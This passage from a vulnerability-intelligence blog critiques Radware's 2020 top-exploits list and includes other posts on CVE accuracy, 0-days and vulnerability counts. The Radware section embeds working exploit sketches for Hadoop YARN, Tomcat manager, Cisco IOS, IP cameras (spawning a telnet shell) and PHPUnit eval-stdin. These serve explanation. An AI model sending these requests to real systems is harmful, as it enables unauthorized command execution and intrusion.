Commentary on Radware’s Top Web Exploits of 2020

At the close of each year we see at least one article covering the top vulnerabilities / exploits from the prior year. These are usually written on the back of large detection networks across the Internet that get a comprehensive view of exploitation, and they are a great way to get real intelligence on criminal hacking activity. Unfortunately, we often see a breakdown when it comes to conveying that information in a useful manner. There is an argument to be made that the companies releasing such blogs are primarily after PR, sure. But they also have an opportunity to help their clients and the rest of the world by ensuring the blogs contain more useful and actionable information.

For this commentary, I’ll examine Radware’s blog, “The Top Web Service Exploits in 2020” published December 23, 2020 and covered almost verbatim by Security Magazine on January 5, 2021. I don’t have a view into exploit activity itself, but I do have a good view into the vulnerability disclosure landscape that is a cornerstone of this commentary.

We’ll start by setting a few basic ideas for mutual understanding for any such blog. First, each exploit should be tied to a unique vulnerability; if it is an exploit chain, each vulnerability in the chain should be clearly delineated, and if it is not a pure vulnerability, the blog should explain what it represents. Second, it should provide at least one external reference for each vulnerability; either a CVE ID, vendor advisory, or commonly accepted third-party advisory such as one from US-CERT or a similar body. This is what allows the reader to quickly determine whether their organization has patched against the vulnerability. If I have to spend considerable time trying to determine which vulnerability is being described, many organizations may be at a complete loss trying to figure it out.

With that, let’s look at the top 10 exploited vulnerabilities in 2020, according to Radware, and try to figure out some additional information for perspective. I will also be very clear that Radware’s blog is extremely frustrating and not immediately helpful, instead requiring a lot of extra work. The fact that they only attributed three exploits to a CVE ID is a dismal commentary on the CVE ecosystem. This analysis of their analysis will serve as a reminder that comprehensive vulnerability intelligence is the foundation of any good security program.


Service Exploit #1: /ws/v1/cluster/apps/new-application

Based on their description, this appears to match VulnDB 184750 “Apache Hadoop YARN ResourceManager REST API Request Handling Remote Command Execution”. The first thing of interest is that it was disclosed on October 19, 2016 and still does not have a CVE assignment over four years later. No wonder many organizations aren’t aware of this vulnerability and have not sought out their own remediation strategy.
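
For context on why this endpoint shows up in scan traffic so often: an exposed ResourceManager REST API lets anyone request an application ID and then submit an “application” whose launch command is attacker-controlled. Below is a minimal sketch of that publicly documented flow; the host and command are hypothetical and the JSON is trimmed to the relevant fields.

```python
# Minimal sketch of abusing an exposed, unauthenticated YARN
# ResourceManager REST API; host and command are hypothetical.
import requests

RM = "http://yarn.example.com:8088"  # hypothetical exposed ResourceManager

# Step 1: anyone can request a new application-id on an unsecured cluster
app_id = requests.post(f"{RM}/ws/v1/cluster/apps/new-application",
                       timeout=5).json()["application-id"]

# Step 2: submit an "application" whose container launch command is
# attacker-controlled; YARN runs it on a cluster node
payload = {
    "application-id": app_id,
    "application-name": "probe",
    "application-type": "YARN",
    "am-container-spec": {"commands": {"command": "id > /tmp/poc"}},
}
requests.post(f"{RM}/ws/v1/cluster/apps", json=payload, timeout=5)
```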

Service Exploit #2: /manager/html

This is summarized as “Apache Tomcat Manager Application Upload Authenticated Code Execution” and goes on to describe it as “This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a JSP application using a POST request against the /manager/html/upload component.”

Despite this description, it does not cleanly map to any vulnerability in VulnDB. The closest matches are CVE-2017-12615 and CVE-2017-12617, which are abstractions of the same issue across different platforms, fundamentally “Apache Tomcat HTTP PUT Method JSP File Upload Remote Code Execution”. On the surface this is a match, with Apache Tomcat, a JSP application, and a POST request to achieve code execution. However, those two CVEs cover a JSP file upload, not a WAR archive, and do not mention the /manager/html/upload component. So we’re left wondering if the exploit described is simply a misconfiguration scenario (i.e. intended functionality not secured) or an actual disclosed vulnerability.
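
Either way, the traffic itself is easy to picture. Here is a hedged sketch of the upload step the description refers to, with a hypothetical host and credentials. Note that it only works with valid manager credentials (and newer Tomcat releases also demand a CSRF nonce, omitted here), which is why default or weak credentials are the real story:

```python
# Hedged sketch of an authenticated WAR upload to the Tomcat manager
# application; host and credentials are hypothetical. Newer Tomcat
# releases also require a CSRF nonce with this form, omitted here.
import requests

url = "http://tomcat.example.com:8080/manager/html/upload"
auth = ("tomcat", "tomcat")  # hypothetical default credentials

with open("shell.war", "rb") as war:
    # "deployWar" is the file field used by the manager's HTML upload form
    requests.post(url, auth=auth,
                  files={"deployWar": ("shell.war", war)}, timeout=10)
```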

Service Exploit #3: /level/15/exec/-/sh/run/CR

Based on the description, this is a misconfiguration scenario where an administrator sets up a Cisco router with the HTTP admin interface enabled, but without password protection. This allows an attacker to use the legitimate functionality to run arbitrary commands.
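
For those unfamiliar with the URL format, the IOS HTTP server maps URLs of the form /level/&lt;privilege&gt;/exec/&lt;command&gt; onto the CLI, so “sh/run/CR” is simply “show running-config” followed by a carriage return. A sketch of the probe, with a hypothetical router address:

```python
# Sketch of the probe; router address is hypothetical. With the HTTP
# server enabled and no authentication configured, this returns the
# full running configuration at privilege level 15 (enable).
import requests

router = "http://192.0.2.1"  # hypothetical router
r = requests.get(f"{router}/level/15/exec/-/sh/run/CR", timeout=5)
print(r.text)
```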

Service Exploit #4: /admin/assets/js/views/login.js

Radware says this “resource belongs to Sangoma FreePBX code and it looks like the attackers are trying to detect vulnerable FreePBX servers and exploit one of the known vulnerabilities.” The first issue is that the script doesn’t immediately track to a VulnDB entry based on titles, which typically reflect the script name. However, let’s consider the URL being seen: … login.js. Rather than attempting to exploit “one of the known vulnerabilities”, I would suggest instead that they are trying default credentials. At least back around 2000, the tried-and-true default credentials of admin/admin were all you needed to access the interface.

This one is curious to me because presumably a company that was detecting exploit traffic and could see e.g. POST requests as demonstrated in Service Exploit #2, would also see that the attackers were trying the default credentials. So we’re left with Service Exploit #4 being of little help and only creating confusion over what is being exploited.

Service Exploit #5: /ftptest.cgi?loginuse=&loginpas=

Radware attributes this to “many cheap Wireless IP web cameras use the same genetic code based on the GoAhead code (the tiny, embedded web server).” This tracks cleanly with VulnDB 181032 “Axis Multiple Products axis-cgi/ftptest.cgi Multiple Parameters Remote Command Execution Weakness”. This is actually a fun rabbit hole, as this disclosure originally comes from an audit of an AXIS A1001 Network Door Controller, and exploitation of the issue requires privileged access to the management interface. With that in mind, we’re back to a default credential scenario that may be the actual issue. Back in 2001, defaults for Axis network cameras were covered by CVE-2001-1543.

[Update: Z Balazs points out that this finding is likely due to Persirai botnet activity and links to more information.]
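
If this is indeed Persirai-style activity, the two-request pattern from the WIFICAM disclosures is a reasonable guess at what the probes look like: store a shell command substitution via set_ftp.cgi, then trigger it with ftptest.cgi. A hedged sketch, with a hypothetical host; note that both requests pass loginuse/loginpas, i.e. they assume working (often default) credentials:

```python
# Hedged sketch of the WIFICAM/Persirai-style probe this traffic
# matches; host and credentials are hypothetical.
import requests

cam = "http://camera.example.com"
creds = {"loginuse": "admin", "loginpas": "admin"}  # assumed defaults

# store an FTP "password" containing a shell command substitution
requests.get(f"{cam}/set_ftp.cgi", timeout=5,
             params={**creds, "svr": "192.0.2.1", "port": "21",
                     "user": "ftp", "pwd": "$(telnetd -l /bin/sh)",
                     "dir": "/", "mode": "PORT"})
# trigger it: the camera shells out to test the stored FTP settings
requests.get(f"{cam}/ftptest.cgi", params=creds, timeout=5)
```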

Service Exploit #6: /service/extdirect

This is the first of only three exploits covered that they include a CVE ID for. CVE-2019-7238 maps to VulnDB 198437 “Nexus Repository Manager /service/extdirect Insufficient Access Control Request Handling Remote Code Execution”. But, is that really the right ID? If we look at CVE-2020-10204 we are given a very brief summary of “Sonatype Nexus Repository before 3.21.2 allows Remote Code Execution” and a link to the vendor advisory. However, VulnDB 226228 also maps to this and is summarized as “Nexus Repository Manager /service/extdirect Request Handling Remote Command Execution”. We immediately see the /service/extdirect from Radware’s finding in both titles. The vendor’s advisory does not include this endpoint, but we find it in an exploit published on GitHub that tracks with CVE-2020-10204, and we see it in a different exploit for CVE-2019-7238.

CVE-2019-7238 was fixed in Nexus Repository Manager version 3.15.0 and CVE-2020-10204 was fixed in version 3.21.2. Due to the vague vendor advisories it is difficult to tell if this was a regression situation or something else. But, the CVE-2020-10204 vendor advisory gives us the interesting bit in the context of exploitation: “The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM.” That is an important distinction! So this is likely CVE-2019-7238 as Radware says, unless there are default credentials which would allow for exploiting CVE-2020-10204 as well.

Looking at the NVD entry for CVE-2020-10204 we also see that they scored this incorrectly for their CVSSv3 score, as ‘Privileges Required‘ should be ‘High‘, not ‘Low‘ as they have it.
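
To see how much that one metric matters, here is a quick sketch of the CVSSv3.1 base formula with the rest of the vector NVD published (AV:N/AC:L/UI:N/S:U/C:H/I:H/A:H) held constant; the weights come from the FIRST specification:

```python
# What flipping Privileges Required does to the score, using the
# CVSSv3.1 base formula; a sketch of the spec's math, not NVD's code.
import math

PR_LOW, PR_HIGH = 0.62, 0.27  # v3.1 PR weights when scope is unchanged

def base_score(pr):
    exploitability = 8.22 * 0.85 * 0.77 * pr * 0.85  # AV:N, AC:L, UI:N
    iss = 1 - (1 - 0.56) ** 3                        # C:H, I:H, A:H
    impact = 6.42 * iss
    return math.ceil(min(impact + exploitability, 10) * 10) / 10  # roundup

print(base_score(PR_LOW))   # 8.8, as NVD scored it
print(base_score(PR_HIGH))  # 7.2, what PR 'High' yields
```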

Service Exploit #7: /solr/admin/info/system?wt=json

For this one, we get an Apache Bug ID (SOLR-4882) and CVE-2013-6397 as references, which is great. That said, it would be very helpful if Radware would link to these resources to make it easier for their readers.
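
Worth noting is that the request itself is just a fingerprint: the info/system handler returns Solr version and JVM details as JSON, which lets a scanner decide whether a target is worth attacking. A sketch against a hypothetical host, with JSON keys per the Solr admin handler of that era:

```python
# Sketch of the fingerprinting request; host is hypothetical.
import requests

r = requests.get("http://solr.example.com:8983/solr/admin/info/system",
                 params={"wt": "json"}, timeout=5)
print(r.json()["lucene"]["solr-spec-version"])  # e.g. a 4.x version
```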

Service Exploit #8: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

This is the third exploit they match to an ID, CVE-2017-9841, which was disclosed June 27, 2017. Another good reminder that vendor fixes for disclosed vulnerabilities are not being applied, leaving many organizations as low-hanging fruit in the exploit world.

One little nitpick is that the full path they include is likely not how this would manifest on a server. Presumably everything after “src” would be the endpoint being scanned: /Util/PHP/eval-stdin.php
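
For those unfamiliar with the issue, eval-stdin.php passes the raw request body to eval(), so any copy of the file reachable under a web root executes attacker-supplied PHP. A sketch of the typical probe, with a hypothetical host; adjust the path to however the file is exposed on a given server:

```python
# Sketch of the typical CVE-2017-9841 probe; host is hypothetical and
# the path should match however the file is exposed on the target.
import requests

target = "http://example.com/Util/PHP/eval-stdin.php"
r = requests.post(target, data="<?php echo md5('poc');", timeout=5)
print(r.status_code, r.text)  # a vulnerable host echoes the hash back
```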

Service Exploit #9: /hudson

With this, we run into another mess and rabbit hole. Radware summarizes this as “Hudson continuous integration tool – multiple vulnerabilities” and further describes Hudson as “a continuous integration tool written in Java, which runs in a servlet container, such as Apache Tomcat or the GlassFish application server. Over the years the project was replaced by Jenkins. The final release, 3.3.3, was on February 15, 2016. Today Hudson is no longer maintained and was announced as obsolete in February 2017.”

Based on this description, this could be any one of at least 50 vulnerabilities going back to February 2014, one of which does not have a CVE ID. 41 of these are in Jenkins, which is mentioned above.

Other Service Exploits

This is a curious conclusion to the “top 10” list, as it states “In addition to the new items that we covered in this list, we have also seen items that we already saw and covered in our previous blog Top 10 Web Service Exploits in 2019 such as /ctrlt/DeviceUpgrade_1, /TP/public/index.php and /nice%20ports%2C/Tri%6Eity.txt%2ebak.”

That isn’t exactly a #10 on this list, rather a catch-all for “other stuff we saw including…“. The first listed tracks with VulnDB 170573 “Huawei HG532 Routers /ctrlt/DeviceUpgrade_1 NewStatusURL Element Remote Command Execution (Satori)” which is notable as it is used in Satori, a Mirai botnet variant.

The second tracks with VulnDB 194379 “ThinkPHP /public/index.php call_user_func_array() Function vars[1][] Parameter Remote Code Execution“. Note the different exploit path and we see it can actually be exploited via several endpoints according to analysis of the vulnerability by Knownsec 404 Team.

The third doesn’t immediately track with an entry in VulnDB. Radware gives us “/nice%20ports%2C/Tri%6Eity.txt%2ebak” which we can decode to a more friendly “/nice ports,/Trinity.txt.bak“. A quick Google for that request finds a blog from Dragos titled “Threat Hunting With Python Part 2: Detecting Nmap Behavior with Bro HTTP Logs” explaining this request:

The request for “/nice ports,/Trinity.txt.bak” comes from Nmap’s service detection routine testing how a server handles escape characters within a URI. The actual request is “GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0\r\n\r\n”.

So this isn’t an actual exploit, rather, it indicates that attackers are using the Nmap port scanner. This is a good reminder that “exploit scanning” doesn’t always cleanly map to a specific vulnerability.
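
Since the probe is a fixed string, turning this observation into a detection is trivial. A minimal sketch, assuming Apache-style combined logs at a hypothetical path:

```python
# Minimal detection sketch: flag Nmap's service-detection URI in web
# logs. The log path and combined-log format are assumptions.
NMAP_PROBE = "/nice%20ports%2C/Tri%6Eity.txt%2ebak"

with open("/var/log/apache2/access.log") as log:
    for line in log:
        if NMAP_PROBE in line:
            print("probable Nmap service scan from", line.split()[0])
```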


Detecting exploitation is critical for every organization, whether it comes from on-premises devices or a managed detection service. What is more critical is having comprehensive and timely vulnerability intelligence that can turn what you detect into actionable information. That is how you not only detect, but evaluate and remediate, assuming of course the vulnerability is known to the vendor or a mitigation can be enacted.

Not all CVEs are Created Equal. Or even valid…

[I wrote this early 2019 and it was scheduled for January 7 but it apparently did not actually publish and then got lost in my excessive drafts list. I touched it up this week to publish because the example that triggered this blog is old but the response is evergreen. Apologies for the long delay!]

I recently caught a Tweet from @NullCon offering 10 free conferences passes to NullconDasham, awarded to “InfoSec heroes who shared their hard work with the community & contributed to the @CVEnew database“.

I re-Tweeted with comment pointing out “There were at least 311 CVE assignments in 2018 alone, that were for issues that were *not* a vulnerability. I hope you are going to scrutinize the submissions.” Anant Shrivastava replied asking for some examples, and the next morning Mitja Kolsek suggested a blog would be beneficial. Here it is, as short and sweet as I can, which is never short in the world of Vulnerability Databases (VDBs) due to caveats.


Thoughts on 0-days and Risk in 2020

[Stupid WordPress. This was scheduled to publish Nov 23 but didn’t for some reason. Here it is, a bit late…]

On Friday, Maddie Stone from the Google P0 team Tweeted about the 0-day exploits her team tracks. As someone who checks that sheet weekly and tracks vulnerabilities, including ones ‘discovered in the wild’, this is a topic squarely in my tiny niche in the industry. Also, I’m a big fan of the P0 team!

I replied to her Tweet suggesting it come with a disclaimer that it didn’t represent “all” 0-days, rather that they tracked high-end 0-days used primarily in “APT” attacks. Ben Hawkes, manager of the team, replied and agreed with that assessment. Before we proceed, let’s define 0-day real quick, since the term is used for a variety of vulnerabilities, often incorrectly.

In this case, the context is that a 0-day is a vulnerability that was actually found being exploited in the wild before there was public knowledge of it. In Risk Based Security’s VulnDB, we track that as “discovered in the wild”. Since VulnDB is comprehensive and our goal is to track every vulnerability, regardless of software or severity, we tend to aggregate a lot more than others. As of this post, we have over 78,000 vulnerabilities that aren’t found in CVE / NVD as a point of comparison. In my reply to Maddie I pointed out that we had seen 51 this year compared to their 22.

Next, Allen Householder replied to me with a fun question: how many vulnerabilities did that really represent? Out of the 20,000+ vulnerabilities aggregated in 2020, we have 51 that are flagged as “discovered in the wild”. That represents only 0.25% of all vulnerabilities this year. One point I made previously is that Google’s team likely doesn’t care about a 0-day in the “Adning Advertising Plugin for WordPress” despite it being used to compromise WordPress blogs.

So with that number in mind, it goes back to the narrative that companies need to be scared of 0-days. They absolutely do! But… and this is the big qualifier that needs to come with that fear… perhaps they don’t need to be as afraid of 0-days as they are of already public vulnerabilities that they missed. With only 51 0-days in 2020, the vast majority of organizations simply aren’t likely to be targeted. Fully patching all known vulnerabilities that impact them should be priority one.

More to the point, vulnerabilities that have functional public exploits, allowing anyone to trivially launch a viable attack, are consistently a much bigger risk than the elusive 0-days. That is also a reminder of how often CVSS falls short if your vulnerability intelligence doesn’t provide Temporal scoring or exploit availability. Organizations making risk decisions using only the CVSS Base score are missing out on an important risk attribute.
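
As a concrete illustration, the CVSSv3.1 temporal score simply multiplies the base score by the exploit code maturity, remediation level, and report confidence weights. A sketch using the weights from the FIRST specification; the vectors are illustrative and not tied to any specific CVE:

```python
# Sketch of CVSSv3.1 temporal scoring with the spec's weights;
# illustrative values, not tied to a specific CVE.
import math

def temporal(base, e, rl, rc):
    return math.ceil(base * e * rl * rc * 10) / 10  # CVSS "roundup"

# 9.8 base with a functional public exploit, no fix yet (E:F/RL:U/RC:C)
print(temporal(9.8, e=0.97, rl=1.00, rc=1.0))  # 9.6
# the same flaw once an official fix ships (E:F/RL:O/RC:C)
print(temporal(9.8, e=0.97, rl=0.95, rc=1.0))  # 9.1
```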

I’ll end this blog with some arbitrary statistics around 0-days for fun! These are based on VulnDB data as of 11/21/2020. Note that metadata is less complete before 2012, which includes ‘discovered in the wild’ classification.

  • 241,690 vulnerabilities, only 641 are 0days (0.27%)
  • 14 are in Google products: Chrome (5), V8 (3), Android (6)
  • 146 are in Microsoft products: Windows (63), IE (36)
  • 13 are in Apple products
  • 7 are in Oracle products: Java (4)
  • 62 are in Adobe products: Flash (38), Reader (14)
  • 18 are in security products 😞
  • The oldest is from 1975 in RSTS/E! Yes, for real.
  • The oldest you likely recognize is Sendmail in November, 1983

Vulnerability Counts Are a Moving Target

At the end of each year, we see articles covering how many vulnerabilities were disclosed the prior year. Because the articles are written about the same time of year, it gives a fairly good initial comparison from year to year; at least, on the surface. This is the foundation of statements such as “Security vulnerabilities in critical infrastructure up 600%”. My company, Risk Based Security, even includes that general type of observation in our vulnerability reports, with caveats. These sensationalized counts and figures are also often used to make claims that one product is more or less secure than another, when vulnerability counts typically cannot support such claims as they are built on severely incomplete data. In reality, we must remember that such numbers are only a snapshot in time and serve as a quick comparison between years, not much more.

Before we get to the “moving target” topic, we need to cover a bit of background on how all this happens.

First, consider that even with a large team doing vulnerability aggregation, there is a limit to the number of sources that can be monitored. While a team might monitor over 4,000 sources on a daily to weekly basis, we know there are a lot more out there. As new researchers create their blogs, older vendors finally create advisory pages, and new vendors pop up, the number of new sources is growing at an incredible rate. Additionally, consider that there are over a million results for “site:github.com changelog.md” (not to mention variations like “release_notes” or “changelog.txt” and similar) that could potentially host a trove of vague vulnerability mentions. Even more daunting, back in 2010 GitHub was hosting 1 million repositories and now they host over 100 million. That means there is an overwhelming number of bug trackers, pull requests, and over a billion commits on a single site. Any company that claims to monitor all of that, or “millions” of sources? Do your due diligence and be ready to walk away from them.

Second, due to available resources, vulnerability aggregation teams have to prioritize their activity. This is usually done by vendor, product, and time frame, where widely deployed vendors and products get the most attention. With “time frame”, emphasis is placed on the more recent vulnerabilities as they are most likely to be relevant to organizations. Moving past that, a vulnerability intelligence (VI) provider must work with clients to learn what resources they use, as that allows them to prioritize and ensure they are covering exactly what is deployed first and foremost. After all that, as time permits, they have to come up with new ways to expand source coverage without compromising quality or speed.

With that in mind, consider a vendor that finally publishes a changelog or makes their bug tracker open for everyone. While a VI team should love to go through such resources as far back as possible, they have to limit themselves to vulnerabilities for the current year, and then some amount of time farther back in case clients are using older versions (especially for third-party dependencies). Time permitting, the team should then go back even further to dig for older and more obscure vulnerabilities. While these may or may not immediately benefit clients based on the software they are running, it does contribute directly to the vulnerability history of a given product or vendor. This is invaluable in determining the “cost of ownership” for a product and is vital to making a decision between multiple vendors offering the same type of solutions. With all of that data, it is trivial for a VI provider to provide a quick and easy-to-understand picture of that cost.

Even with very limited time to dig that far back into sources, the impact can still be seen clearly. In January of 2013, Risk Based Security’s VulnDB team had aggregated 8,822 vulnerabilities for the 2012 calendar year, and CVE covered only 4,765 of them (54%). Compared to the prior year (7,911 in 2011), we could say that disclosures increased around 12%. The next question we must ask is whether those numbers aged well and hold true today.

Looking at VulnDB now, there were 10,856 vulnerabilities disclosed in 2012. So in the past eight years, the team has managed to find an additional 2,034 vulnerabilities disclosed that year. That means comparing 2012’s updated 10,856 count with the older 7,911 count for 2011, the increase is closer to 37%. But wait, we can no longer use the 7,911 count for 2011 either, since that too is a moving target! Ultimately, as previously stated, these disclosure numbers are only good as a snapshot in time. Depending on when you perform the count, you may find wildly varying results that could heavily bias any conclusions you try to make. Do the people writing the statistics you read and cite disclaim that?

In January of 2013, I started taking counts every month for how many vulnerabilities VulnDB aggregated for the 2012 calendar year. Almost eight years later, and this blog and chart shows just how much that number can change. As with all vulnerability statistics, please make sure you fully understand what they really mean and disclaim as needed!

[Chart: vulnerabilities disclosed in 2012, as counted over time; values range from roughly 7,000 to 11,000.]

With this visual we can see that in the years after 2012, vulnerability aggregation continued to rise considerably. Over time that growth tapers off as the team simply didn’t have time to keep digging that far back into changelogs and bug trackers looking for more vulnerabilities that were less beneficial to organizations.

The tl;dr takeaways:

  • The number of vulnerabilities disclosed in a given year is static, but the VI teams that aggregate the information won’t find them all that year.
  • Vulnerabilities by year, as reported, will slowly climb over time as additional aggregation work is performed.
  • While that newly aggregated data may be “old” as far as what software is being used within an organization, it still contributes to better metadata and product/vendor evaluation (“cost of ownership”).

“The History of CVE” and A Couple of Objections

I just read “The History of Common Vulnerabilities and Exposures (CVE)” by Ary Widdes from Tripwire and found it to be a great summary of the 20+ years of the program. I say that even as an outspoken CVE and MITRE critic! I do have a couple of objections, however, with the conclusion, and then a fun bounty!

Widdes concludes the history by saying:

A lot has changed in the 21 years since the CVE List’s inception – both in terms of technology and vulnerabilities. Without the CVE List, it’s possible that security professionals would still be using multiple tools from multiple vendors just to ensure complete coverage. It’s also possible that someone else would have created a service similar to the CVE List. Either way, from idea to whitepaper to database, the CVE List has become a core part of vulnerability and patch management.

There’s a lot to unpack here so I will take it one sentence at a time, starting with the second.

“Without the CVE List, it’s possible that security professionals would still be using multiple tools from multiple vendors just to ensure complete coverage.”

No, there is no “possible” here. That is a simple reality with an important caveat. The reality is that teams of all types still use multiple tools from multiple vendors to do their job. The caveat, and more to the point of that sentence, is that CVE doesn’t offer “complete coverage” and many of the vulnerability scanners only cover a third of the issues in CVE for various reasons. Even using a combination of firewalls, vulnerability scanners, intrusion detection/prevention, audits, and a slew of other tools, organizations are likely seeing half of what CVE has to offer at best. Widdes’ conclusion here gives undue credit to CVE and the state of vulnerability coverage it offers.

“It’s also possible that someone else would have created a service similar to the CVE List.”

This is where the vulnerability historian in me wants to rage a bit. This statement is unequivocally false for the simple reason that vulnerability databases existed before CVE, both free (e.g. X-Force) and commercial (e.g. RSI), in 1997 alone [1]. The first vulnerability database was created in 1973 and was specific to Multics, at a time when there weren’t many other systems to catalog bugs or vulnerabilities in. In 1983 we saw the Mt Xinu Bug List and in 1985 Matt Bishop’s List of UNIX Holes, both of which covered more than one platform. If we consider a vulnerability database implemented via product, we had ISS, SATAN, Ballista, and Nessus between 1995 and the creation of CVE in 1999. Many of the hackers turned security professionals may fondly remember Fyodor’s Exploit World (1996 – 1998) from both aspects of their lives. Those same folks probably also remember Packet Storm (1998), which is still running today.

“Either way, from idea to whitepaper to database, the CVE List has become a core part of vulnerability and patch management.”

This, unfortunately, is true. I say unfortunately because of my long-standing criticisms of CVE over the past decade, which I won’t go into here.

Bug(s) Bounty:

If there is anyone at MITRE open to outright bribery, including all-you-can-eat sushi dinners, I will pay a bounty to get my hands on that list of 8,400 submissions! While I know there are likely a lot of duplicates, the vulnerability historian in me would love to audit that data to see if MITRE decided to skip any that would be considered vulnerabilities by today’s standards, or where someone else back then had more knowledge of a vulnerability than was submitted. That data is over twenty years old and was solicited, processed, and partially published with U.S. taxpayer money. There’s no reason not to make it public. =)

[1] The Repent Security Inc. (RSI) database existed in 1997 but may not have been offered as a commercial product until 1998.

Why @anacondainc Doesn’t Fully Understand CVEs

It’s worrisome that in 2020 we still have people in influential technical roles who don’t understand CVE. A friend told me earlier this year he was in a meeting where someone said that CVE IDs are assigned in order, so CVE-2020-9500 meant there had been 9,500 vulns in 2020 so far. Of course that is not how it works, and it reflects a dangerous misunderstanding of CVE.

I ran across an article written by Nick Malkiewicz of Anaconda titled “Why Understanding CVEs Is Critical for Data Scientists”. This article has several bits that show a lack of understanding of what CVE is. One of the biggest is equating a CVE with a vulnerability. Yes, many vulnerabilities directly map to a single CVE identifier, but the CVE is the identifier, not the vulnerability. Additionally, sometimes one vulnerability can track with multiple CVE IDs, or one CVE ID can track to multiple vulnerabilities. So lines like the following are concerning:

When someone finds a CVE, they report it to a CVE Numbering Authority (CNA).

When someone finds a vulnerability, they report it to MITRE or a vendor, which may be a CNA but more often is not. That vendor can then ask MITRE for an ID via a web form.

CNAs assign identification numbers to CVEs and list them in publicly accessible databases.

A CNA is required to inform MITRE after a CVE-assigned vulnerability has been disclosed. That is actually a fairly recent rule, implemented in the last few years. For most of CVE’s history there was no requirement or specific communication channel for a CNA to notify MITRE of this. That was one of many failings of the CVE ecosystem and directly led to companies being breached, as they relied on CVE to be ‘complete’ and timely.

Each vulnerability listed in a CVE database has a score from .1 to 10, 10 being the highest risk level. These scores are based on exploitability, impact, remediation level, report confidence, and other qualities.

Technically, not even the first line is true, as NVD can score a vulnerability as 0.0, meaning it is not a vulnerability and poses no risk. This occurs when a researcher or vendor discloses a vulnerability but doesn’t fully understand the issue or the subsequent impact. This happens hundreds of times a year, although many are not included in NVD. The second sentence from Anaconda is also incorrect, as NVD only provides CVSS Base scores. The exploitability, remediation level, and report confidence metrics are part of Temporal scores and are not included. You can see an example with CVE-2020-2800, published by Oracle and given a CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N score by both Oracle and NVD. This misunderstanding of NVD CVSS scoring is all the more baffling because Anaconda links to the same FIRST CVSS document I do in this paragraph.

Anaconda goes on talking about how there are other factors at play including looking at the history of a package, how fast vendors respond, and more. This is great advice and critical for companies facing tens of thousands of vulnerabilities a year. Unfortunately, they slide into the “more lipstick on that pig” problem:

The good news is, there are tools that automate the CVE monitoring process.

This is true. But more ways to manipulate bad data still leaves you with bad data. In addition to CVE missing several thousand vulnerabilities a year, their push for quantity in the last few years has led to a serious hit on quality. There are some CVE IDs with descriptions missing critical information like the vendor, affected version, or impact. All the data wrangling and fancy analysis of that data is still based on bad or incomplete information. All the lipstick on that pig still makes it a pig.

Finally, I will quote one other line from their blog that is curious:

Hacking open-source software also has a bigger payoff because many more people use it.

I understand and appreciate the sentiment, and finding a vulnerability in a library like OpenSSL obviously has a huge impact. However, that and a couple dozen other libraries are still the outliers in the bigger picture. Compare a vulnerability like EternalBlue to a standard open source library vulnerability and they are not even close as far as how “many more people use it”.

Rebuttal: Dark Reading’s “9” Sources for Tracking New Vulnerabilities

[This was originally published on the OSVDB blog.]

Earlier today, Sean Martin published an article on Dark Reading titled “9 Sources For Tracking New Vulnerabilities“. Spanning 10 pages, likely for extra ad revenue, the sub-title reads:

Keeping up with the latest vulnerabilities — especially in the context of the latest threats — can be a real challenge.

One would hope this article would help with that challenge, and it most certainly is one. First, a disclaimer; I was involved with OSVDB for roughly 10 years and the primary curator over that time. Further, I am now involved with Risk Based Security’s VulnDB commercial vulnerability database offering. Both of these are mentioned in the article, so my comments below will most certainly have some level of bias.

To help readers, Sean Martin writes “In no particular order, here are nine key vulnerability data sources for your consideration.” With that, flip to the next page of the article.

It’s important to understand the source — and backing for your source — to avoid getting left without a solid vulnerability database. A good example is the case where many had to say goodbye to their vulnerability feed when minority-player Open Source Vulnerability Database (OSVDB) was shut down.

“Not having OSVDB any longer, while sad for those that relied on it, may actually reduce the complexity in making sure there is integration across all products, MSSPs, services, and SIEMs,” says Fred Wilmot, chief technology officer at PacketSled.

I am not sure how OSVDB constituted a “minority-player” in any sense of the term given its broad coverage for a decade. While historical entries were often incomplete, the database was commercially maintained from just before January 2012, and the information was still given away for free, despite competing with the company providing the support and updates. Since the quote specifically mentions that OSVDB shut down, and it did on April 5, 2016, it’s nice to hear people give belated appreciation to the project. OSVDB shutting down, I would argue, does not reduce the complexity of anything for those knowledgeable about vulnerability disclosure. On the surface, sure! One less set of IDs to integrate across products sounds like a good thing. However, you have to remember that OSVDB was cataloging thousands of vulnerabilities a year that were not found in the other sources listed in this article. That means there is a level of complexity here that is horrible for companies trying to keep up with vulnerabilities.

Page 3 tells readers about NIST’s National Vulnerability Database (NVD):

NVD is the US government repository of standards-based vulnerability management data. This data enables automation of vulnerability management, security measurement, and compliance. NVD is based on and synchronized with the CVE List (see next slide).

First, since NVD is synchronized with CVE, it is curious that they are listed as separate sources. For those not aware, NVD is a sort of ‘value add’ to CVE in that they generate CVSS and CPE data for the vulnerabilities cataloged by MITRE for the CVE project. Monitoring NVD means you are already monitoring all of CVE and getting the additional meta-data. It is also important to note that the meta-data is outsourced to a contractor who employs ‘junior analysts’ to do the work. This becomes apparent if you consume their data and actually look at their CVSS scores over the last ~8 years. Personally, I stopped emailing them corrections many years back due to the volume involved. To this day, you can still often see them scoring Adobe Flash vulnerabilities as CVSSv2 10.0, meaning they miss the ‘context-dependent’ (a.k.a. ‘user-assisted’) aspect, which moves the access complexity from ‘L’ow to ‘M’edium per the CVSSv2 scoring guide on FIRST, resulting in a 9.3 score. Seems minor, but that reclassifies a vulnerability from ‘Critical’ to ‘High’ for many organizations, and should make you question their scoring on more complex issues.

Page 4 tells us more about CVE and offers some “insight” into it that is horribly wrong:

CVE is a dictionary of publicly known information security vulnerabilities and exposures. CVE’s common identifiers enable data exchange between security products and provide a baseline index point for evaluating coverage of tools and services.

Morey Haber, VP of technology at BeyondTrust, offers these examples:
Scanning tools most commonly use CVEs for classification
SIEM technologies understand their applicability in reporting
Risk frameworks use them as a calculation vehicle for applied risk to the business

First, I cannot over-share Steve Ragan’s recent article titled “Over 6,000 vulnerabilities went unassigned by MITRE’s CVE project in 2015“. Consider just the headline, and then think about the fact that CVE does not catalog at least 47,267 vulnerabilities historically. Now, re-read Haber’s examples of how CVE is used and what kind of Achilles’ heel that is for any organization using security software based on CVE.

Fred Wilmot’s quote about CVE is what prompted me to write this entire blog. This is so incredibly wrong and misleading:

